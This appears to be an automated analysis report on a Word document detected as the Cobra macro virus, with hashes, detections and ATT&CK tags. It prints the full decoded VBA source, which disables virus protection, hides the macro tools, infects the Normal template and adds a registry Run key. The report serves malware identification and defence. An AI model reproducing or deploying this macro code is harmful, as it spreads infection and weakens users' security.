Cobra Office (OLE) malware analysis — malicious · 58703d5bc3ba9a31

MALICIOUS

Office (OLE)

39.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 1b7689a33a58e066ef3314e26d85d1c5 SHA-1: e5a4bce1c0cb15ffa52abd0d1879961b552cad24 SHA-256: 58703d5bc3ba9a31861e5c0274d2729bbf5bbd52b46007421f47bc301f752d0a

240 Risk Score

Malware Insights

Cobra · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Cobra-12'. The presence of VBA macros, specifically the 'AutoOpen' and 'Auto_Close' subroutines within the 'BornCobra' module, indicates malicious intent. These macros are designed to disable security features like virus protection and prompt for saving the Normal template, likely to facilitate further infection or payload delivery.

Heuristics 5

ClamAV: Doc.Trojan.Cobra-12 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Cobra-12
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12876 bytes
SHA-256: `5b0020890f88da0659871b8f85222fa285e69cc9796bd9e963836575630d6999`
Detection ClamAV: Doc.Trojan.Cobra-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "BornCobra" 'Cobra Version 2.0E 'A intelligent member of Cobra family Sub AutoOpen() Call IntMenu Call InfCobra Call RegE End Sub Sub AutoClose() Call IntMenu Call InfCobra Call RegE End Sub Sub FileNew() Call IntMenu Call InfCobra Call RegE Dialogs(wdDialogFileNew).Show End Sub Sub FileOpen() Call IntMenu Call InfCobra Call RegE Dialogs(wdDialogFileOpen).Show End Sub Sub FileExit() On Error Resume Next Call IntMenu Call InfCobra Call RegE WordBasic.FileExit End Sub Sub IntMenu() On Error Resume Next CommandBars("Tools").Controls("Macro").Enabled = False CommandBars("Tools").Controls("Macro").Visible = False CommandBars("Tools").Controls("Macro").Delete CommandBars("View").Controls("Toolbars").Enabled = False CommandBars("View").Controls("Toolbars").Visible = False CommandBars("View").Controls("Toolbars").Delete FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable Options.VirusProtection = False Options.SaveNormalPrompt = False End Sub Sub InfCobra() On Error Resume Next Dim Mac, MacFound MacFound = False For Each Mac In NormalTemplate.VBProject.VBComponents If Mac.Name <> "ThisDocument" And Mac.Name <> "BornCobra" Then Application.OrganizerDelete Source:=NormalTemplate.FullName, _ Name:=Mac.Name, Object:=wdOrganizerObjectProjectItems End If Next For Each Mac In NormalTemplate.VBProject.VBComponents If Mac.Name = "BornCobra" Then MacFound = True End If Next If MacFound = False Then Application.OrganizerCopy Source:=ActiveDocument.FullName, _ Destination:=NormalTemplate.FullName, Name:="BornCobra", _ Object:=wdOrganizerObjectProjectItems End If MacFound = False For Each Mac In ActiveDocument.VBProject.VBComponents If Mac.Name <> "ThisDocument" And Mac.Name <> "BornCobra" _ And Mac.Name <> "Reference to Normal" Then Application.OrganizerDelete Source:=ActiveDocument.FullName, _ Name:=Mac.Name, Object:=wdOrganizerObjectProjectItems End If Next For Each Mac In ActiveDocument.VBProject.VBComponents If Mac.Name = "BornCobra" Then MacFound = True End If Next If MacFound = False Then Application.OrganizerCopy Source:=NormalTemplate.FullName, _ Destination:=ActiveDocument.FullName, Name:="BornCobra", _ Object:=wdOrganizerObjectProjectItems End If End Sub Sub RegE() SR = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") If SR <> "Cobra" Then System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "Cobra" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "349,PB/ER/DHK-1217/BD" End If ID = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "InfectDate") If Not IsDate(ID) Then System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "InfectDate") = Format(Date, "mm/dd/yyyy") ID = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "InfectDate") End If CD = Format(Date, "mm/dd/yyyy") TD = DateValue(CD) - DateValue(ID) If TD > 60 Then SysR = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "SystemRoot") System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Cobra") = SysR + "\Cobra.Doc" ActiveDocument.SaveAs (SysR + "\Cobra.Doc"), FileFormat:=wdFormatTemplate WordBasic.FileExit End If End Sub ' Processing file: /opt/analyzer/scan_staging/37f01cfb32e34f8c831bb02f3c8a128b.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 90 ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.